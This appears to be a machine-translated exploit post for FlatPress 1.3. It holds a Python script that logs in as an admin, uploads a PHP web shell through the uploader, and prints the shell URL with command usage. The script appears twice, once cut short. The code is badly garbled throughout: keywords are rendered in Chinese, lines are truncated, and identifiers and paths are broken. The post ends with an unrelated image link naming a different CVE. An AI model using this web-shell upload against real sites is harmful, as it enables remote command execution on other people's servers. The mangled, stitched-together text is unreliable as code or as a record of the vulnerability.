#利用标题: FlatPress V1.3-远程命令执行
#发现了: AhmetümitBayram
#发现的日期: 19.04.2024
#供应商homepage: https://www.flatpress.org
#软件link: https://github.com/flatpressblog/flatpress/archive/1.3.zip
#测试版本: 1.3(最新)
#在: MacOS上测试
导入请求
进口时间
导入随机
导入字符串
DEF Random_string(长度=5):
''Rastgele bir stringoluşturur。''''
字母=string.ascii_lowercase
返回''.join(随机。
def login_and_upload(base_url,用户名,密码):
文件名=Random_string() +'.php'
login_url=f'http://{base_url}/login.php'
upload_url=f'http://{base_url}/admin.php?p=uploaderaction=default'
使用requests.session()为Session:
#利用
打印(“利用.”)
时间。
#Giriş yapma denemesi
login_data={
'user':用户名,
'Pass':密码,
'提交:'登录'
}
打印('登录.')
响应=session.post(login_url,data=login_data)
时间。
如果``登录''中的响应.text:
打印('登录成功!')
其他:
打印(“登录失败!”)
打印(响应。文本)
返回
#DosyaYüklemeDenemesi
打印('外壳上传.')
时间。
#形式ve dosyalar
文件={
'上载[]':(fileName,'?=
}
form_data={
'_wpnonce':'9E0ED04260',
'_wp_http_referer':'/admin.php?p=uploader',
'upload':'上传'
}
响应=session.post(upload_url,files=files,data=form_data)
如果“ file(s)上载”响应中的text或'upslos.text:
shell_url=f'http://{base_url}/fp-content/actacts/{filename}'
打印(f'your shell已准备就绪: {shell_url}')
时间。
打印(f'shell USAGE: {shell_url}?0=命令')
其他:
打印(“利用失败!”)
print(wendesp.status_code,response.text)
#ÖRNEKKULLANım
ython script.py siteadi.com用户名密码
如果name=='__ -Main __':
导入系统
如果Len(sys.argv)!=4:
打印('USAGE:脚本.py base_url用户名密码')
其他:
base_url,用户名,密码=sys.argv [1:]
login_and_upload(base_url,用户名,密码)
#发现了: AhmetümitBayram
#发现的日期: 19.04.2024
#供应商homepage: https://www.flatpress.org
#软件link: https://github.com/flatpressblog/flatpress/archive/1.3.zip
#测试版本: 1.3(最新)
#在: MacOS上测试
导入请求
进口时间
导入随机
导入字符串
DEF Random_string(长度=5):
''Rastgele bir stringoluşturur。''''
字母=string.ascii_lowercase
返回''.join(随机。
def login_and_upload(base_url,用户名,密码):
文件名=Random_string() +'.php'
login_url=f'http://{base_url}/login.php'
upload_url=f'http://{base_url}/admin.php?p=uploaderaction=default'
使用requests.session()为Session:
#利用
打印(“利用.”)
时间。
#Giriş yapma denemesi
login_data={
'user':用户名,
'Pass':密码,
'提交:'登录'
}
打印('登录.')
响应=session.post(login_url,data=login_data)
时间。
如果``登录''中的响应.text:
打印('登录成功!')
其他:
打印(“登录失败!”)
打印(响应。文本)
返回
#DosyaYüklemeDenemesi
打印('外壳上传.')
时间。
#形式ve dosyalar
文件={
'上载[]':(fileName,'?=
$ _get [0]?'?','text/php'),}
form_data={
'_wpnonce':'9E0ED04260',
'_wp_http_referer':'/admin.php?p=uploader',
'upload':'上传'
}
响应=session.post(upload_url,files=files,data=form_data)
如果“ file(s)上载”响应中的text或'upslos.text:
shell_url=f'http://{base_url}/fp-content/actacts/{filename}'
打印(f'your shell已准备就绪: {shell_url}')
时间。
打印(f'shell USAGE: {shell_url}?0=命令')
其他:
打印(“利用失败!”)
print(wendesp.status_code,response.text)
#ÖRNEKKULLANım
ython script.py siteadi.com用户名密码如果name=='__ -Main __':
导入系统
如果Len(sys.argv)!=4:
打印('USAGE:脚本.py base_url用户名密码')
其他:
base_url,用户名,密码=sys.argv [1:]
login_and_upload(base_url,用户名,密码)
![[CVE-2020-14644]-远程命令执行](https://hackhub.org/data/avatars/s/0/2.jpg){kind=small}
